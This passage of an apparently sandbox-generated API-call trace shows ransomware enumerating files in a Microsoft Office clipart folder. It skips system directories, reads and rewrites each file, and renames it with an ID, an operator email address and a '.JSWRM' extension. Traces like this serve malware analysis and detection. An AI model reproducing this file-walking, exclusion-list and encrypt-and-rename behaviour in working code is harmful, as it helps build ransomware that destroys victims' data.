lpString2="$RECYCLE.BIN") returned 1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="system volume information") returned -1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="msocache") returned -1 [0087.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0087.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199473.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199473.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199473.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0087.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0087.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199473.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199473.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199473.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0087.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0087.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.758] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10776) returned 1 [0087.758] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a10) returned 0x24d210 [0087.758] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a10, lpOverlapped=0x0) returned 1 [0087.760] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.760] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a10, lpOverlapped=0x0) returned 1 [0087.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.760] CloseHandle (hObject=0x314) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0087.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0087.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0087.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0087.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0087.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.761] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0087.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.762] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1484, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199475.WMF", cAlternateFileName="")) returned 1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2=".") returned 1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="..") returned 1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="...") returned 1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="windows") returned -1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="recovery") returned -1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="perflogs") returned -1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="documents and settings") returned 1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="system volume information") returned -1 [0087.762] lstrcmpiW (lpString1="J0199475.WMF", lpString2="msocache") returned -1 [0087.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199475.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199475.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199475.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199475.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199475.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199475.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0087.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.763] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5252) returned 1 [0087.763] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1480) returned 0x205850 [0087.763] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1480, lpOverlapped=0x0) returned 1 [0087.765] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.765] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1480, lpOverlapped=0x0) returned 1 [0087.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.765] CloseHandle (hObject=0x314) returned 1 [0087.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0087.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0087.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0087.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0087.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0087.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0087.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0087.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0087.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.766] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199483.WMF", cAlternateFileName="")) returned 1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2=".") returned 1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="..") returned 1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="...") returned 1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="windows") returned -1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="recovery") returned -1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="perflogs") returned -1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="documents and settings") returned 1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="system volume information") returned -1 [0087.766] lstrcmpiW (lpString1="J0199483.WMF", lpString2="msocache") returned -1 [0087.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0087.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199483.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199483.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199483.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0087.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0087.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199483.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199483.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199483.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0087.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.767] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10164) returned 1 [0087.767] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27b0) returned 0x24d210 [0087.767] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27b0, lpOverlapped=0x0) returned 1 [0087.769] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.769] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27b0, lpOverlapped=0x0) returned 1 [0087.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.770] CloseHandle (hObject=0x314) returned 1 [0087.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0087.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0087.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0087.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0087.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0087.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.770] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0087.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.771] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x302c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199609.WMF", cAlternateFileName="")) returned 1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2=".") returned 1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="..") returned 1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="...") returned 1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="windows") returned -1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="recovery") returned -1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="perflogs") returned -1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="documents and settings") returned 1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="system volume information") returned -1 [0087.771] lstrcmpiW (lpString1="J0199609.WMF", lpString2="msocache") returned -1 [0087.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199609.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199609.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199609.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199609.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199609.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199609.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.771] 